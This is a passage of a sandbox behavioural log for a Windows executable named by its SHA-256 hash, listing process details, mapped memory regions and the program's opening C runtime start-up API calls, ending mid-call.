# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 06.01.2022 21:04:19.324 Process: id = "1" image_name = "6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" page_root = "0x721ba000" os_pid = "0x1378" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x618" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 118 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 119 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 120 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 121 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 122 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 123 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 124 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 125 start_va = 0x400000 end_va = 0x461fff monitored = 1 entry_point = 0x41c630 region_type = mapped_file name = "6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe") Region: id = 126 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 129 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 130 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 131 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 269 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 270 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 271 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 273 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 274 start_va = 0x590000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 275 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 276 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 277 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 278 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 279 start_va = 0x470000 end_va = 0x52dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 280 start_va = 0x74810000 end_va = 0x748a1fff monitored = 0 entry_point = 0x74850380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 281 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 282 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 283 start_va = 0x770000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 284 start_va = 0x900000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 285 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 286 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 287 start_va = 0x30000 end_va = 0x38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 288 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 289 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 290 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 291 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 292 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 293 start_va = 0x530000 end_va = 0x559fff monitored = 0 entry_point = 0x535680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 294 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 295 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 296 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 297 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 298 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 299 start_va = 0xc20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 300 start_va = 0x70970000 end_va = 0x709e4fff monitored = 0 entry_point = 0x709a9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 301 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 302 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 303 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 304 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 305 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 306 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 307 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 308 start_va = 0x590000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 309 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 310 start_va = 0x590000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 311 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 312 start_va = 0x74c60000 end_va = 0x74d7efff monitored = 0 entry_point = 0x74ca5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 313 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 314 start_va = 0x2020000 end_va = 0x20dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 315 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 316 start_va = 0x70720000 end_va = 0x7073cfff monitored = 0 entry_point = 0x70723b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 317 start_va = 0x560000 end_va = 0x562fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 333 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Thread: id = 1 os_tid = 0xfdc [0086.582] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0086.583] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x8f0000 [0086.643] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.643] GetProcAddress (hModule=0x74f30000, lpProcName="FlsAlloc") returned 0x74f4a980 [0086.643] GetProcAddress (hModule=0x74f30000, lpProcName="FlsGetValue") returned 0x74f47570 [0086.643] GetProcAddress (hModule=0x74f30000, lpProcName="FlsSetValue") returned 0x74f49e30 [0086.643] GetProcAddress (hModule=0x74f30000, lpProcName="FlsFree") returned 0x74f54ff0 [0086.644] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.644] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.644] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.644] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.645] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.645] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.645] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.645] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.645] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.645] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.645] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.646] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.646] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.646] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.647] GetProcAddress (hModule=0x74f30000, lpProcName="DecodePointer") returned 0x77bed830 [0086.647] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x238) returned 0x8f05a8 [0086.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.647] GetProcAddress (hModule=0x74f30000, lpProcName="DecodePointer") returned 0x77bed830 [0086.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0086.647] GetProcAddress (hModule=0x74f30000, lpProcName="EncodePointer") returned 0x77bef730 [0086.648] GetProcAddress (hModule=0x74f30000, lpProcName="DecodePointer") returned 0x77bed830 [0086.648] GetCurrentThreadId () returned 0xfdc [0086.648] GetStartupInfoA (in: lpStartupInfo=0x19fe84 | out: lpStartupInfo=0x19fe84*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0086.648] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x824) returned 0x8f07e8 [0086.648] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0086.648] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.649] SetHandleCount (uNumber=0x20) returned 0x20 [0086.649] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe\" " [0086.649] GetEnvironmentStringsW () returned 0x67fe98* [0086.649] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xa3e) returned 0x8f1018 [0086.649] FreeEnvironmentStringsW (penv=0x67fe98) returned 1 [0086.649] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x44d7a0, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe")) returned 0x62 [0086.650] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xf2) returned 0x8f1a60 [0086.650] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xb4) returned 0x8f1b60 [0086.650] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x62) returned 0x8f1c20 [0086.650] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x80) returned 0x8f1c90 [0086.650] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x92) returned 0x8f1d18 [0086.650] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x9c) returned 0x8f1db8 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x86) returned 0x8f1e60 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x4c) returned 0x8f1ef0 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x6c) returned 0x8f1f48 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x3e) returned 0x8f1fc0 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x5e) returned 0x8f2008 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x86) returned 0x8f2070 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x4e) returned 0x8f2100 [0086.651] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x52) returned 0x8f2158 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x40) returned 0x8f21b8 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xf6) returned 0x8f2200 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xa0) returned 0x8f2300 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x5a) returned 0x8f23a8 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x5e) returned 0x8f2410 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xb4) returned 0x8f2478 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x48) returned 0x8f2538 [0086.652] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x54) returned 0x8f2588 [0086.653] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x5a) returned 0x8f25e8 [0086.653] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x6c) returned 0x8f2650 [0086.653] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x76) returned 0x8f26c8 [0086.653] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x60) returned 0x8f2748 [0086.653] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xfa) returned 0x8f27b0 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x52) returned 0x8f28b8 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x42) returned 0x8f2918 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x50) returned 0x8f2968 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x78) returned 0x8f29c0 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x76) returned 0x8f2a40 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x48) returned 0x8f2ac0 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x66) returned 0x8f2b10 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x50) returned 0x8f2b80 [0086.654] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x68) returned 0x8f2bd8 [0086.655] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x48) returned 0x8f2c48 [0086.655] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f1018) returned 1 [0086.665] HeapFree (in: hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f1018 | out: hHeap=0x8f0000) returned 1 [0086.751] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0xa4) returned 0x8f2c98 [0086.751] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x824) returned 0x8f1018 [0086.751] GetLastError () returned 0x0 [0086.751] SetLastError (dwErrCode=0x0) [0086.751] GetLastError () returned 0x0 [0086.752] SetLastError (dwErrCode=0x0) [0086.752] GetLastError () returned 0x0 [0086.752] SetLastError (dwErrCode=0x0) [0086.752] GetACP () returned 0x4e4 [0086.752] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x244) returned 0x8f2d48 [0086.752] GetLastError () returned 0x0 [0086.752] SetLastError (dwErrCode=0x0) [0086.752] IsValidCodePage (CodePage=0x4e4) returned 1 [0086.752] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe44 | out: lpCPInfo=0x19fe44) returned 1 [0086.752] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f908 | out: lpCPInfo=0x19f908) returned 1 [0086.752] GetLastError () returned 0x0 [0086.752] SetLastError (dwErrCode=0x0) [0086.752] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8a0 | out: lpCharType=0x19f8a0) returned 1 [0086.752] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0086.752] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x22c) returned 0x8f2f98 [0086.753] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x8f2fc0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0086.753] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpCharType=0x19fc28 | out: lpCharType=0x19fc28) returned 1 [0086.753] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f2f98) returned 1 [0086.753] HeapFree (in: hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f2f98 | out: hHeap=0x8f0000) returned 1 [0086.753] GetLastError () returned 0x0 [0086.753] SetLastError (dwErrCode=0x0) [0086.753] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0086.754] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0086.754] RtlAllocateHeap (HeapHandle=0x8f0000, Flags=0x0, Size=0x22c) returned 0x8f2f98 [0086.754] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f920, cbMultiByte=256, lpWideCharStr=0x8f2fc0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0086.754] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 